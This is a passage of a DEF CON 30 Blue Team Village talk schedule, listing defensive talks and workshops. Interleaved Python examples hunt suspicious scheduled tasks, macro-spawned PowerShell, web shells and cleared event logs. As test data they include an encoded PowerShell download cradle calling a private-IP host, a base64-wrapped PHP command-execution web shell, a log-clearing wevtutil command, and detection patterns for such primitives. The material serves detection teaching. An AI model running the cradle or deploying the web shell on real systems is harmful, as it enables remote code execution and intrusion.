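    <Arguments>-NoP -W Hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA</Arguments></Exec></Actions>
</Task>"""},
    {"SubjectUserName": "backupadmin", "TaskName": r"\Backups\NightlyCopy",
     "TaskContent": r"""<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Principals><Principal><UserId>S-1-5-21-1111-2222-3333-1105</UserId><RunLevel>LeastPrivilege</RunLevel></Principal></Principals>
  <Actions><Exec><Command>cmd.exe</Command><Arguments>/c robocopy C:\Data \\fs01\backup /MIR /LOG:C:\Logs\bk.log</Arguments></Exec></Actions>
</Task>"""},
]


def _local(tag):
    """Strip the XML namespace so we can match on bare element names."""
    return tag.rsplit("}", 1)[-1]


def parse_task(task_xml):
    """Pull the fields a hunter cares about out of the task definition XML."""
    info = {"command": "", "arguments": "", "user": "", "runlevel": "", "hidden": False}
    for el in ET.fromstring(task_xml).iter():
        name, text = _local(el.tag), (el.text or "").strip()
        if name == "Command":
            info["command"] = text
        elif name == "Arguments":
            info["arguments"] = text
        elif name == "UserId":
            info["user"] = text
        elif name == "RunLevel":
            info["runlevel"] = text
        elif name == "Hidden":
            info["hidden"] = text.lower() == "true"
    return info


def score_task(record):
    """Apply the hunt hypothesis to one 4698 record; each tripped indicator adds a reason."""
    info = parse_task(record["TaskContent"])
    exe = info["command"].replace("/", "\\").rsplit("\\", 1)[-1].strip('"').lower()
    reasons = []
    if exe in LOLBINS:
        reasons.append(f"action runs interpreter/LOLBin {exe}")
    if SUSPICIOUS_ARGS.search(info["arguments"]):
        reasons.append("arguments contain an encoded command, download cradle or hidden window")
    if "\\" not in record["TaskName"].strip("\\"):
        reasons.append("task registered in the root folder rather than under a vendor folder")
    if info["user"] == "S-1-5-18" and exe in LOLBINS:
        reasons.append("interpreter runs as SYSTEM")
    if info["hidden"]:
        reasons.append("task flagged Hidden")
    return {"task": record["TaskName"], "creator": record["SubjectUserName"],
            "score": len(reasons), "reasons": reasons}


def hunt(records, min_score=2):
    """Return records tripping at least min_score indicators (threshold is an assumption)."""
    return [r for r in map(score_task, records) if r["score"] >= min_score]


if __name__ == "__main__":
    for hit in hunt(SAMPLE_4698):
        print(hit["task"], hit["creator"], hit["score"], "; ".join(hit["reasons"]))
```

Scoring instead of hard-matching is what lets the same query serve both the hunt and the later analytic: the admin's backup task that runs cmd.exe trips one indicator and stays below the threshold, while the hidden SYSTEM-level PowerShell task trips five. Lowering min_score to 1 turns the hunt into a broader, noisier detection.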
Project Obsidian: Track 0x42 (In-person)
Obsidian REM: Long Walks On The Beach: Analyzing Collected PowerShells
Project Obsidian (in-person)
2022-08-12T14:00:00-07:00
14:00
01:00
So you just got a bunch of PowerShell scripts dumped on you. What now?
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
call-for-content-2022-217-obsidian-rem-long-walks-on-the-beach-analyzing-collected-powershells
en
A quick introduction to malware analysis, PowerShell script analysis, and how not to panic when VirusTotal shrugs.
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/PE7C8T/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/PE7C8T/feedback/
Talks (Virtual)
Threat Hunt Trilogy: A Beast in the Shadow!
Talk (virtual, prerecorded)
2022-08-13T11:00:00-07:00
11:00
01:00
Fileless threats operate in silence and stealth, enabling adversaries to bypass automated cybersecurity, lurk in our digital wonderland, and avoid standard detections. They are hidden beasts in the shadow! This technical talk will briefly explain the different types of fileless threats and the importance of threat hunting to combat them. A Windows-based fileless threat will also be hunted via live system, memory, and network packet analysis, followed by a comparative discussion of each method's capabilities. The threat hunt hypotheses used in this presentation are practical, and all will be mapped to MITRE knowledge bases.
call-for-content-2022-172-threat-hunt-trilogy-a-beast-in-the-shadow-
en
Although fileless threats may require some sort of file to operate or indirectly use files in some part of their lifecycle (e.g., the infection chain), their malicious activities are conducted only in memory. Adversaries misuse trusted applications or native utilities such as PowerShell and WMI to download and load malicious code directly into memory and execute it without touching the hard disk.
A newly discovered fileless threat campaign utilizes an innovative technique, for the first time, to store and hide its shellcode in the Windows event logs, from which it is loaded and used by a dropper in the last stage of the infection lifecycle. To put it simply, fileless threats can be a nightmare for blue teams and threat hunters.
This technical talk will briefly explain the different categories of fileless threats; however, as the title suggests, the focus of this trilogy will be a fileless threat hunt via three different approaches:
• System Live Analysis: A few techniques such as running-process and lineage analysis, command-line strings, masquerading and obfuscation, and port-to-process mapping will be used to look for fileless threat traces on a live, active system.
• Memory Forensics: This is one of the most exciting parts, as it dives into the main territory of fileless threats and examines PowerShell execution, the process tree and hierarchy, and handles to look for any potential signs of threats.
• Network Packet Investigation: Network conversations, malicious HTTP requests, transferred files, and adversaries' commands will be extracted from network packets (i.e., a sample PCAP file) to hunt the fileless threat used in the previous parts.
Finally, a comparative review discusses the advantages and disadvantages of the above techniques. All three approaches will be conducted using open-source and free tools, native operating system commands, and built-in utilities. The threat hunt hypotheses and educated guesses will be formulated based on the industry test cases provided by MITRE ATT&CK, D3FEND, and CAR (Cyber Analytics Repository).
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/JA9NDV/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/JA9NDV/feedback/
Talks (Virtual)
Even my Dad is a Threat Modeler!
Mini Talk (virtual, prerecorded)
2022-08-13T12:15:00-07:00
12:15
00:30
The talk will mainly focus on different threat modelling frameworks and how threat modelling can be made more efficient, learning from past experiences and the common mistakes organizations make while doing threat modelling.
call-for-content-2022-173-even-my-dad-is-a-threat-modeler-
en
Detailed outline will be as follows:
1. What is threat modelling?
2. Why is threat modelling necessary?
3. Common threat modelling frameworks:
All the mentioned frameworks will be explained in detail with actionable scenarios, how to measure violations, and how to propose mitigations
STRIDE
PASTA
VAST
TRIKE
4. How to plan threat modelling?
5. What NOT to do when doing threat modelling?
6. How to handle the results of threat modelling so they do not overwhelm different stakeholders?
For example:
In STRIDE, I'll give an overview and then walk through real-life scenarios:
1. Explanation of the framework
2. Examples:
2.1. Spoofing identity refers to a violation of authentication
Can be portrayed by misconfigured VPN configurations (in detail)
2.2. Tampering with data refers to integrity
Having mutable logs and a super admin having the toxic right to change them (in detail)
2.3. Non-repudiation
Multiple users using the same set of credentials, causing non-repudiation problems and making logs useless because actions can't be traced back to the user performing them (in detail)
etc.
I will give examples from actual threat modelling exercises I have done but remove all organisation-related information and make them generic, then show what the scenarios look like in organisations.
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/VMHQQ3/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/VMHQQ3/feedback/
Talks (Virtual)
The DFIR Report Homecoming Parade Panel
Talk (virtual, prerecorded)
2022-08-13T13:00:00-07:00
13:00
01:00
Follow along as we take the D3FC0N Hacker Homecoming theme to the next level with a DFIR Report Homecoming Parade. The panel will provide additional context to various DFIR Reports released in the past year. Pick up some tips and tricks to up your game!
call-for-content-2022-188-the-dfir-report-homecoming-parade-panel
en
The DFIR Report Homecoming Parade will not discuss normal (BAU) CTI actions, such as searching the logs for hits on the IOCs or entering the IOCs into a Threat Intelligence Platform (TIP) or other alerting platform. Instead, the participants will focus on pivoting, TTPs, and how they would take the contents in the various DFIR Reports to the NEXT LEVEL! When the Panelists respond to the DFIR Reports, they are operating under the assumption that they performed the preliminary analysis and deemed the threat report relevant to their environment. The purpose of this assumption is to decrease the amount of debate on whether or not something is relevant to get to the part of the analysis that involves extracting actionable takeaways. https://github.com/ch33r10/DEFCON30-BTV-TheDFIRReportHomecomingParadePanel
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/SWJTX9/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/SWJTX9/feedback/
Talks (Virtual)
Hunting Malicious Office Macros
Mini Talk (virtual, prerecorded)
2022-08-13T14:15:00-07:00
14:15
00:30
When reviewing threat intelligence reports it is common to see malicious Office macros of various types used as an initial access vector. Recently, Microsoft announced big changes to Office behavior in the context of malicious macros. However, organizations still struggle with detecting malicious macros which is often a prerequisite for implementing any type of hardening changes. The aim of this talk is to address this gap and provide guidance on how to detect malicious macro usage in environments and highlight the necessary steps to ensure systems are properly hardened against this threat.
call-for-content-2022-171-hunting-malicious-office-macros
en
The talk will cover the following areas:
- Baselining Office macros behaviors
- Contextualized / Risk-based alerting strategies
- Data sets & Sysmon configurations will be provided
- Coverage of new attack vectors such as mark of the web bypasses and VSTO files
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/833UZN/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/833UZN/feedback/
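The live-system techniques listed in the Threat Hunt Trilogy abstract (process lineage, command-line strings, masquerading and obfuscation) and the macro-behaviour baselining in the abstract above reduce to the same question over Sysmon Event ID 1 data: who spawned what, with which arguments. The Python below is an added example that serves both passages; it is not code from either talk. It walks constructed process-creation records, decodes -EncodedCommand payloads (UTF-16LE base64), and flags Office-spawned script hosts, download cradles in the decoded command line, and a "svchost.exe" running from a user profile with the wrong parent. Field names follow Sysmon's EID 1 schema; the records, the expected-parent table and the indicator lists are assumptions for illustration.

```python
import base64
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# Core Windows processes whose parent is fixed; any other parent means masquerading.
EXPECTED_PARENT = {"svchost.exe": {"services.exe"}, "lsass.exe": {"wininit.exe"},
                   "csrss.exe": {"smss.exe"}}
CRADLE = re.compile(r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b"
                    r"|invoke-expression|frombase64string|reflection\.assembly|https?://)", re.I)

# Constructed sample payload: built here so the base64 is guaranteed to round-trip.
CRADLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/stage.ps1')"
SAMPLE_ENC = base64.b64encode(CRADLE_SCRIPT.encode("utf-16-le")).decode()
WINWORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
PWSH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed Sysmon Event ID 1 records, reduced to the fields used here (not real telemetry).
SAMPLE_EVENTS = [
    {"ProcessId": 4100, "Image": WINWORD, "ParentProcessId": 3000,
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": '"WINWORD.EXE" /n "C:\\Users\\jdoe\\Downloads\\Invoice.docm"'},
    {"ProcessId": 4188, "Image": PWSH, "ParentProcessId": 4100, "ParentImage": WINWORD,
     "CommandLine": f"powershell.exe -NoP -W Hidden -enc {SAMPLE_ENC}"},
    {"ProcessId": 4200, "Image": r"C:\Users\jdoe\AppData\Local\Temp\svchost.exe",
     "ParentProcessId": 4188, "ParentImage": PWSH, "CommandLine": "svchost.exe -k netsvcs"},
    {"ProcessId": 900, "Image": r"C:\Windows\System32\svchost.exe", "ParentProcessId": 700,
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": "C:\\Windows\\System32\\svchost.exe -k netsvcs -p"},
    {"ProcessId": 5000, "Image": PWSH, "ParentProcessId": 3000,
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\inventory.ps1"},
]


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE) or None."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def lineage(proc, by_pid):
    """Walk ParentProcessId links through the events we hold: child <- parent <- ..."""
    chain, ppid, seen = [basename(proc["Image"])], proc["ParentProcessId"], set()
    while ppid in by_pid and ppid not in seen:
        seen.add(ppid)
        chain.append(basename(by_pid[ppid]["Image"]))
        ppid = by_pid[ppid]["ParentProcessId"]
    return " <- ".join(chain)


def analyze(events):
    """Apply the lineage, command-line and masquerading checks; return one finding per process."""
    by_pid = {e["ProcessId"]: e for e in events}
    findings = []
    for e in events:
        img, parent = basename(e["Image"]), basename(e["ParentImage"])
        reasons = []
        if parent in OFFICE_APPS and img in SCRIPT_HOSTS:
            reasons.append(f"{parent} spawned {img} (macro-style execution)")
        decoded = decode_encoded_command(e["CommandLine"])
        if decoded:
            reasons.append("encoded PowerShell command decoded")
        # Match cradles against the decoded payload when there is one, else the raw command line.
        if img in SCRIPT_HOSTS and CRADLE.search(decoded or e["CommandLine"]):
            reasons.append("download cradle / in-memory loader in command line")
        if img in EXPECTED_PARENT:
            if not e["Image"].lower().startswith(SYSTEM_DIRS):
                reasons.append(f"{img} running from outside System32 (masquerading)")
            if parent not in EXPECTED_PARENT[img]:
                reasons.append(f"{img} parent is {parent}, expected {sorted(EXPECTED_PARENT[img])}")
        if reasons:
            findings.append({"pid": e["ProcessId"], "lineage": lineage(e, by_pid),
                             "decoded": decoded, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f["pid"], f["lineage"], "|", "; ".join(f["reasons"]))
```

For baselining, run the same analysis over a week of normal Office telemetry first: the Office-parent rule should be near silent, and every hit on it after that is worth a ticket. The encoded-command decode is what makes the cradle rule useful; matching only the raw command line would miss the sample entirely.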
Talks (Virtual)
Horusec - Brazilian SAST help World
Lightning Talk (virtual, prerecorded)
2022-08-13T15:00:00-07:00
15:00
00:15
Presentation of the Horusec tool (https://github.com/ZupIT/horusec) that was developed by ZUP IT in Brazil to help companies identify security problems in the most common languages still in a development environment or the IDE.
call-for-content-2022-184-horusec-brazilian-sast-help-world
en
Demonstrate how Horusec can help and how easy it is to get started. Show the evolution of the latest version and invite people to contribute. Show the Log4j case, where we became a top trend on Twitter because of the detection, after which several big companies started using it.
Demonstrate everything from installation to configuration to detection, and how AppSec and Blue Team teams can benefit.
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/WQWVCW/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/WQWVCW/feedback/
Workshops (Virtual)
Web Shell Hunting
Workshop (4-hr, virtual, live)
2022-08-13T11:00:00-07:00
11:00
04:00
Web Shells are malicious web applications used for remote access. They've been used in many of the recent prominent breaches/vulnerabilities including Equifax, SolarWinds, and ProxyLogon and are used by APTs and other threats. With ProxyLogon, the FBI was authorized to remove them from victim machines.
This session will help you avoid telling your employer that the FBI is now doing volunteer admin work by teaching you about Web Shells, how to hunt for them, and doing hands-on hunting in a VM. A little groundwork goes a long way and this class will show what to do.
call-for-content-2022-185-web-shell-hunting
en
This workshop will provide the basics of what web shells are, how they are typically used, defensive strategies to prevent them, and ways they can be detected in different layers of security. The detection layers that will be covered are antivirus/endpoint protection, file integrity monitoring, file system analysis, log analysis, network traffic analysis, and endpoint anomaly detection.
Participants will be provided with a virtual machine image that they could both exploit with web shells and perform threat hunting on.
The breakdown is roughly this:
60-80 minutes - what web shells are, what they're used for, ways they can be detected
20 minutes - overview of my perspective on what web threat hunting is and how it varies from conventional threat hunting (TLDR - if you're on the internet, you're always going to be attacked so it's not a matter of picking up an unknown threat so much as filtering through evidence to determine if an attack is actually dangerous)
90+ minutes - hands-on exercises covering various ways to detect web shells, such as file integrity monitoring, deobfuscation, YARA, dirty words, time stomping, etc., and then exploiting a vulnerable application, uploading a web shell, and showing how it can be used to plunder data.
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/LL8KS8/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/LL8KS8/feedback/
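Several of the detection layers the workshop lists (file integrity monitoring, deobfuscation, dirty words, time stomping) can be shown together on a throwaway web root. The Python below is an added example, not workshop material: it snapshots a constructed web root, drops a base64-wrapped PHP shell with a backdated modification time, and then reports new or modified files, the dirty words found after unwrapping the base64 layer, and the mtime/ctime mismatch. The dirty-word list and the 24-hour stomping threshold are assumptions. The ctime check relies on POSIX semantics (ctime cannot be set from user space); on Windows, where st_ctime is the creation time, compare the MFT's $STANDARD_INFORMATION and $FILE_NAME timestamps instead.

```python
import base64
import hashlib
import os
import re
import tempfile
import time

# "Dirty words": PHP primitives a shell needs (code/command execution, decoding layers,
# request-controlled input). Matched as calls or superglobals, not as substrings.
DIRTY_WORDS = re.compile(
    r"(?<![\w$])(eval|assert|system|passthru|shell_exec|exec|popen|proc_open|base64_decode"
    r"|gzinflate|str_rot13|move_uploaded_file)\s*\(|(\$_(?:GET|POST|REQUEST|COOKIE))\b", re.I)
B64_LITERAL = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]{16,})['\"]\s*\)")
WEB_EXT = (".php", ".phtml", ".asp", ".aspx", ".jsp", ".jspx")


def sha256_file(path):
    with open(path, "rb") as f:
        return hashlib.sha256(f.read()).hexdigest()


def baseline(root):
    """File-integrity snapshot: relative path -> SHA-256 for every file under the web root."""
    snap = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            snap[os.path.relpath(full, root).replace(os.sep, "/")] = sha256_file(full)
    return snap


def fim_diff(old, new):
    return {"added": sorted(set(new) - set(old)),
            "modified": sorted(k for k in old if k in new and old[k] != new[k]),
            "removed": sorted(set(old) - set(new))}


def deobfuscate(text):
    """Unwrap one layer of base64_decode('...') literals; real shells often stack several."""
    layers = []
    for blob in B64_LITERAL.findall(text):
        try:
            layers.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
        except ValueError:
            pass
    return layers


def scan_file(path, stomp_threshold=86400):
    with open(path, encoding="utf-8", errors="replace") as f:
        text = f.read()
    layers = deobfuscate(text)
    hits = set()
    for body in [text] + layers:  # scan the raw file and each decoded layer
        hits |= {(m.group(1) or m.group(2)).lower() for m in DIRTY_WORDS.finditer(body)}
    st = os.stat(path)
    # Time stomping: mtime pushed into the past while the inode change time stayed recent.
    timestomped = (st.st_ctime - st.st_mtime) > stomp_threshold
    return {"path": path, "dirty_words": sorted(hits), "decoded_layers": len(layers),
            "timestomped": timestomped}


def hunt(root, known_good):
    """FIM diff against the baseline, then content/timestamp triage of new or changed web files."""
    diff = fim_diff(known_good, baseline(root))
    suspects = [rel for rel in diff["added"] + diff["modified"] if rel.lower().endswith(WEB_EXT)]
    return {"fim": diff, "findings": [scan_file(os.path.join(root, rel)) for rel in suspects]}


def build_sample_webroot():
    """Constructed web root: a clean baseline, then a dropped and time-stomped shell."""
    root = tempfile.mkdtemp(prefix="webroot-")
    with open(os.path.join(root, "index.php"), "w") as f:
        f.write("<?php include 'header.php'; echo 'Hello'; ?>\n")
    known_good = baseline(root)
    payload = base64.b64encode(b"system($_REQUEST['cmd']);").decode()
    os.makedirs(os.path.join(root, "uploads"))
    shell = os.path.join(root, "uploads", ".cache.php")
    with open(shell, "w") as f:
        f.write(f"<?php @eval(base64_decode('{payload}')); ?>\n")
    old = time.time() - 400 * 86400
    os.utime(shell, (old, old))  # attacker backdates the file to blend in with old content
    return root, known_good


if __name__ == "__main__":
    root, known_good = build_sample_webroot()
    report = hunt(root, known_good)
    print("FIM:", report["fim"])
    for finding in report["findings"]:
        print(finding)
```

The FIM diff does the heavy lifting: on a production web root, scanning every file for dirty words drowns you in framework false positives, while scanning only what changed since the last known-good snapshot keeps the list short enough to read. The stomped mtime is the second opinion that the file is not "old content you forgot about".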
Main Stage (In-person)
Obsidian Forensics: KillChain3 - Continued Adventures in Splunk and Security Onion
Project Obsidian (in-person)
2022-08-13T10:30:00-07:00
10:30
01:00
A Live Forensics Walkthrough of Obsidian Kill Chain 3 (KC3) forensics analysis using Splunk and Security Onion
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
call-for-content-2022-205-obsidian-forensics-killchain3-continued-adventures-in-splunk-and-security-onion
en
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/VDDRCP/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/VDDRCP/feedback/
Main Stage (In-person)
Obsidian CTH Live: Killchain 3 - Are there any logs?
Project Obsidian (in-person)
2022-08-13T13:00:00-07:00
13:00
01:00
Obsidian CTH Live: Killchain 3 Walkthrough
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
call-for-content-2022-213-obsidian-cth-live-killchain-3-are-there-any-logs-
en
Obsidian CTH Live: Killchain 3 - Are there any logs?
What happens when an attacker clears the logs in an effort to hide their tracks? Here we will dive into that question, build a Threat Hunting hypothesis, develop some ways to detect this activity, and document the process.
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/8SAYLD/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/8SAYLD/feedback/
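For the question this session poses, here is an added example (editor-supplied, not the session's own material) in Python over constructed SIEM-side records: it pulls the explicit clear events (1102 in Security, 104 in System), flags discontinuities in EventRecordID within a channel, and lists which other channels still hold events from the window before the clear, which is usually where the hunt continues. It assumes the records reached the SIEM before the clear and that the collection pipeline is lossless; a dropped batch from a forwarder produces the same gap signature, so check forwarder health before calling it anti-forensics. The record values are constructed.

```python
from datetime import datetime, timedelta

# Events that record a log being cleared. 1102 ("The audit log was cleared") lands in
# Security; 104 ("The System log file was cleared") lands in System, also when the
# Application log is the one cleared.
CLEAR_EVENTS = {("Security", 1102), ("System", 104)}

# Constructed SIEM-side records for one host; record IDs are per channel, times are UTC.
# In this sample the Security record IDs restart after the clear.
SAMPLE_EVENTS = [
    {"Channel": "Security", "RecordID": 5001, "EventID": 4624, "Time": "2022-08-13T12:00:01", "User": "CORP\\jdoe"},
    {"Channel": "Security", "RecordID": 5002, "EventID": 4688, "Time": "2022-08-13T12:00:05", "User": "CORP\\jdoe"},
    {"Channel": "Security", "RecordID": 5003, "EventID": 4672, "Time": "2022-08-13T12:10:40", "User": "CORP\\svc-backup"},
    {"Channel": "System", "RecordID": 8800, "EventID": 7036, "Time": "2022-08-13T12:05:00", "User": "SYSTEM"},
    {"Channel": "Microsoft-Windows-Sysmon/Operational", "RecordID": 77000, "EventID": 1,
     "Time": "2022-08-13T11:55:00", "User": "CORP\\jdoe", "CommandLine": "notepad.exe"},
    {"Channel": "Microsoft-Windows-Sysmon/Operational", "RecordID": 77001, "EventID": 1,
     "Time": "2022-08-13T12:30:30", "User": "CORP\\svc-backup", "CommandLine": "wevtutil.exe cl Security"},
    {"Channel": "Security", "RecordID": 1, "EventID": 1102, "Time": "2022-08-13T12:31:00", "User": "CORP\\svc-backup"},
    {"Channel": "System", "RecordID": 8801, "EventID": 104, "Time": "2022-08-13T12:31:02", "User": "CORP\\svc-backup"},
    {"Channel": "Security", "RecordID": 2, "EventID": 4624, "Time": "2022-08-13T12:31:05", "User": "CORP\\svc-backup"},
]


def parse_ts(s):
    return datetime.fromisoformat(s)


def find_log_clears(events):
    """The high-fidelity signal: someone cleared a log, and the event names the account."""
    return [e for e in events if (e["Channel"], e["EventID"]) in CLEAR_EVENTS]


def find_record_anomalies(events):
    """EventRecordID should advance by exactly one per channel. A jump or a restart means
    records are missing from what we hold, from a clear or from a dropped batch."""
    by_channel = {}
    for e in sorted(events, key=lambda e: parse_ts(e["Time"])):
        by_channel.setdefault(e["Channel"], []).append(e)
    anomalies = []
    for channel, recs in by_channel.items():
        for prev, cur in zip(recs, recs[1:]):
            if cur["RecordID"] == prev["RecordID"] + 1:
                continue
            anomalies.append({"channel": channel,
                              "kind": "reset" if cur["RecordID"] < prev["RecordID"] else "gap",
                              "from": prev["RecordID"], "to": cur["RecordID"],
                              "between": (prev["Time"], cur["Time"])})
    return anomalies


def corroborating_sources(events, clear_event, window=timedelta(minutes=30)):
    """Other channels that still hold events from the window ending at the clear."""
    end = parse_ts(clear_event["Time"])
    out = {}
    for e in events:
        if e["Channel"] == clear_event["Channel"]:
            continue
        if end - window <= parse_ts(e["Time"]) <= end:
            out.setdefault(e["Channel"], []).append(e)
    return out


if __name__ == "__main__":
    for clr in find_log_clears(SAMPLE_EVENTS):
        print(f"{clr['Channel']} cleared at {clr['Time']} by {clr['User']}")
        for chan, recs in corroborating_sources(SAMPLE_EVENTS, clr).items():
            print(f"  {len(recs)} event(s) still available in {chan}")
    for a in find_record_anomalies(SAMPLE_EVENTS):
        print(f"{a['channel']}: record ID {a['kind']} {a['from']} -> {a['to']} between {a['between']}")
```

In the sample the answer to "are there any logs?" is yes: the Sysmon channel still carries the wevtutil.exe process creation that did the clearing, attributed to the same account the 1102 names. Documenting the hypothesis, the query and that pivot is the part of the process the session asks for.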
Main Stage (In-person)
Obsidian Live: May We Have the OODA Loops?
Project Obsidian (in-person)
2022-08-13T14:00:00-07:00
14:00
01:00
Incident Response Live Walkthrough: This will go over how to use OODA to effectively investigate and respond to a real-world incident. Come work through the demos alongside experts during this live walkthrough.
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
call-for-content-2022-216-obsidian-live-may-we-have-the-ooda-loops-
en
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/EMATXS/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/EMATXS/feedback/
Main Stage (In-person)
Challenges in Control Validation
Panel (in-person)
2022-08-13T15:00:00-07:00
15:00
01:00
Testing security controls is hard. Really hard. Every incident responder has lived with victims who are sure existing security controls should have prevented or detected the intrusion. While some organizations don’t do any security control validation, those that do understand the challenges. While red team operations allow for point-in-time validation, how are organizations dealing with control validations during product updates or configuration changes? By and large the answer is “they aren’t.” On this panel, we’ll discuss why control validation is difficult. Then we’ll discuss recommendations for scaling control validation operations in practically any organization.
call-for-content-2022-179-challenges-in-control-validation
en
Sample panel questions may include:
How is control validation different from red teaming?
Isn’t control validation just purple teaming? (it’s not)
How do you recommend my organization starts its first control validation exercise?
What's your #1 recommendation for maturing a control validation program?
What are methods for scaling control validation programs?
How much validation is too much? When is the cost no longer justified?
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/QFH3KV/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/QFH3KV/feedback/
Main Stage (In-person)
Making Your SOC Suck Less
Panel (in-person)
2022-08-13T16:00:00-07:00
16:00
01:00
The Security Operations Center: is it really more than a place to go where dreams die? So many analysts feel that there’s no way to improve and they’re in a dead end job. How can you turn your nightmare into something more bearable? By the end of this panel, you will gain a series of tips and tricks to take back to your SOC, you will learn how to get the most from your individual experience, lift up your team around you, or at least recognize when it’s time to run like mad.
call-for-content-2022-190-making-your-soc-suck-less
en
The Security Operations Center: is it really more than a place to go where dreams die? So many analysts feel that the soul-sucking march of awful false positive alerts will never end; there’s no way to improve and they’re in a dead end job. How can you turn your nightmare into something more bearable? Come join our panelists, four security analysts turned leaders, as they get grilled by our moderator in answering this question and more. By the end of this talk, you will gain a series of tips and tricks to take back to your SOC whether it’s new or old, big or small, chaotic or calm. You will learn how to get the most from your individual experience, lift up your team around you, or at least recognize when it’s time to run like mad.
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/UASASZ/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/UASASZ/feedback/
Main Stage (In-person)
Latest and Greatest in Incident Response
Panel (in-person)
2022-08-13T17:00:00-07:00
17:00
01:00
IR is constantly in motion, adversaries change tactics and techniques and so do Incident Responders. Come hear from IR professionals what they've been up to for the past year.
call-for-content-2022-191-latest-and-greatest-in-incident-response
en
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/GRUE9X/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/GRUE9X/feedback/
Project Obsidian: Track 0x41 (In-person)
Obsidian: IR - OODA! An hour in incident responder life
Project Obsidian (in-person)
2022-08-13T10:30:00-07:00
10:30
01:00
Let's dance and fly from dogfight to cyberworld. How to investigate and win against threats.
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
call-for-content-2022-202-obsidian-ir-ooda-an-hour-in-incident-responder-life
en
Project Obsidian Incident Response station will walk through the OODA loop and Jupyter Notebooks to help you investigate, document and answer the key questions during incidents.
This session is based on Kill Chain 3 data set and will leverage msticpy.
Data, Notebook and Presentation will be made available after Defcon.
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/3VFVAC/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/3VFVAC/feedback/
Project Obsidian: Track 0x41 (In-person)
Obsidian Forensics: Kill Chain 3 Endpoint Forensics Walkthrough
Project Obsidian (in-person)
2022-08-13T11:30:00-07:00
11:30
01:00
Obsidian Forensics Station: Kill Chain 3 Endpoint Forensics Walkthrough
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
